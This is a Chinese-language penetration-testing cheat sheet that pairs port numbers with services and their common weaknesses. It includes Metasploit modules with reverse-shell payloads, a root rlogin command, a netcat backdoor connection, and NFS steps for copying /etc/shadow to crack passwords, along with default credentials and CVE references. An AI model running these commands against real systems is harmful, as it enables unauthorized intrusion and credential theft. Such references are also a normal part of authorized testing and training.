20:FTP服務的資料傳輸端口
21:FTP服務的連接配接端口,可能存在 匿名登陸 弱密碼暴力破解 匿名登陸:1.用nc連結21号端口 2.直接使用USER anonymous PASS xxxx
22:SSH服務端口,可能存在 弱密碼暴力破解
23:Telnet端口,可能存在 弱密碼暴力破解
25:SMTP簡單郵件傳輸協定端口,和 POP3 的110端口對應
43:whois服務端口
53:DNS服務端口(TCP/UDP 53)
67/68:DHCP服務端口
69:TFTP端口,可能存在弱密碼
80:HTTP端口,常見web漏洞
110:POP3郵件服務端口,和SMTP的25端口對應
111:rpcbind服務,可能存在端口洩露 使用nmap腳本: nmap -p 111 --script=rpcinfo 目标
135:RPC服務
137/138:NMB服務
139:SMB/CIFS服務,可能存在遠端代碼執行 MSF子產品:use multi/samba/usermap_script PAYLOAD: cmd/unix/reverse
143:IMAP協定端口
161/162: Snmp服務,public弱密碼
389:LDAP目錄通路協定,有可能存在注入、弱密碼
443:HTTPS端口,心髒滴血等與SSL有關的漏洞
445:SMB服務端口,可能存在永恒之藍漏洞MS17-010,和遠端代碼執行
512/513/514:Linux Rexec服務端口,可能存在爆破, 如果配置錯誤,是開啟的rlogin服務則可以使用以下指令進行最高權限登陸 rlogin -l root 被攻擊者ip 就可獲得最高權限
873:Rsync ,可能存在Rsync未授權通路漏洞,傳送門:rsync 未授權通路漏洞
1080:socket端口,可能存在爆破
1099:RMI,可能存在 RMI反序列化漏洞 使用msf 子產品:exploit/multi/misc/java_rmi_server payload: java/meterpreter/reverse_tcp
1352:Lotus domino郵件服務端口,可能存在弱密碼、資訊洩露
1433:SQL Server資料庫端口,可能存在弱密碼
1434:用于向請求者傳回SQL Server使用了哪個TCP/IP端口
1521:oracle資料庫端口
後門:xx端口: xxx服務,後門,已經被攻擊。 掃描時出現bingshell綁定shell,則表明可能存在後門 nc連接配接後門:nc xxx 端口 直接連接配接
2049:NFS服務端口(網絡共享資源和smb類似),可能存在NFS配置不當 檢視銘感目錄: nmap --script=nfs-* 被攻擊者ip 探測nfs是否可導出: 安裝nfs-common: apt-get install nfs-common 探測銘感目錄是否可以導出: showmount -e 被攻擊者ip 檢視導出内容: mkdir nfs_root mount -t nfs(服務)被攻擊者的ip:/被導出的内容,比如:-/nsf_root(導出到這個檔案) -o nolock(直接導出的意思)
最後在 cat -/nfs_root/etc/shadow 下檢視,(根據自己存放的位置) cat /etc/shadow cat /etc/passwd 結合起來就可以破解出他的賬号和密碼
2121:ccproxy-ftp,特點:ftp伺服器程式,proftpd,暴力破解
2181:ZooKeeper監聽端口,可能存在 ZooKeeper未授權通路漏洞
2375:Docker端口,可能存在 Docker未授權通路漏洞
2601: Zebra ,預設密碼zebr
27017:MongoDB未授權通路
3128: squid ,匿名通路(可能内網漫遊)
3306:MySQL資料庫端口,可能存在 弱密碼暴力破解
3389:Windows遠端桌面服務,可能存在 弱密碼漏洞 或者 CVE-2019-0708 遠端桌面漏洞複現
3690:SVN服務,可能存在SVN洩漏,未授權通路漏洞
4440:Rundeck,弱密碼admin
4560:log4j SocketServer監聽的端口,可能存在 log4j<=1.2.17反序列化漏洞(CVE-2019-17571)
4750:BMC,可能存在 BMC伺服器自動化RSCD代理遠端代碼執行(CVE-2016-1542)
4848:GlassFish控制台端口,可能存在弱密碼admin/adminadmin
5000:SysBase/DB2資料庫端口,可能存在爆破、注入漏洞
5432:PostGreSQL資料庫的端口
5632:PyAnywhere服務端口,可能存在代碼執行漏洞
5900/5901:VNC監聽端口(遠端控制),可能存在 VNC未授權通路漏洞 ,暴力破解 msf: 子產品:auxiliary/scanner/vnc/vnc_login 字典使用預設字典,破解密碼和賬戶 最後: 安裝vnc viewer用戶端軟體連接配接vnc服務端
5984:CouchDB端口,可能存在 CouchDB未授權通路漏洞
6379:Redis資料庫端口,可能存在Redis未授權通路漏洞,傳送門:Redis未授權通路漏洞
6667:irc服務(聊天服務)也有漏洞
7001/7002:Weblogic,可能存在Weblogic反序列化漏洞,傳送門:Weblogic反序列化漏洞
7180:Cloudera manager端口
8069:Zabbix服務端口,可能存在Zabbix弱密碼導緻的Getshell漏洞
8080:Tomcat、JBoss,可能存在Tomcat管理頁面弱密碼Getshell,JBoss未授權通路漏洞,傳送門:Tomcat管理弱密碼頁面Getshell
8080-8090:可能存在web服務
8089:Jetty、Jenkins服務端口,可能存在反序列化,控制台弱密碼等漏洞
8161:Apache ActiveMQ背景管理系統端口,預設密碼密碼為:admin:admin ,可能存在CVE-2016-3088漏洞,傳送門:Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)
8180:tomcat,(免費開源代碼的web應用伺服器,屬于輕量級應用伺服器) 子產品:auxiliary/scanner/http/tomcat_mgr_login,破解登陸密碼 子產品:multi/http/tomcat_mgr_deploy,反彈shell
8500:Adobe ColdFusion 任意檔案讀取,反序列化漏洞
該服務為:JRun Web Server
9000:fastcgi端口,可能存在遠端指令執行漏洞
9001:Supervisord,可能存在Supervisord遠端指令執行漏洞(CVE-2017-11610),傳送門:Supervisord遠端指令執行漏洞(CVE-2017-11610)
9043/9090:WebSphere,可能存在WebSphere反序列化漏洞
9200/9300:Elasticsearch監聽端口,可能存在 Elasticsearch未授權通路漏洞 10000:Webmin-Web控制台,可能存在弱密碼
10001/10002:JmxRemoteLifecycleListener監聽的,可能存在Tomcat反序列化漏洞,傳送門:Tomcat反序列化漏洞(CVE-2016-8735)
11211:Memcached監聽端口,可能存在 Memcached未授權通路漏洞
27017/27018:MongoDB資料庫端口,可能存在 MongoDB未授權通路漏洞
50000:SAP Management Console服務端口,可能存在 運程指令執行漏洞。
50070:Hadoop服務端口,可能存在 Hadoop未授權通路漏洞
61616:Apache ActiveMQ服務端口,可能存在 Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)複現
60020:hbase.regionserver.port,HRegionServer的RPC端口
60030:hbase.regionserv er.info.port,HRegionServer的http端口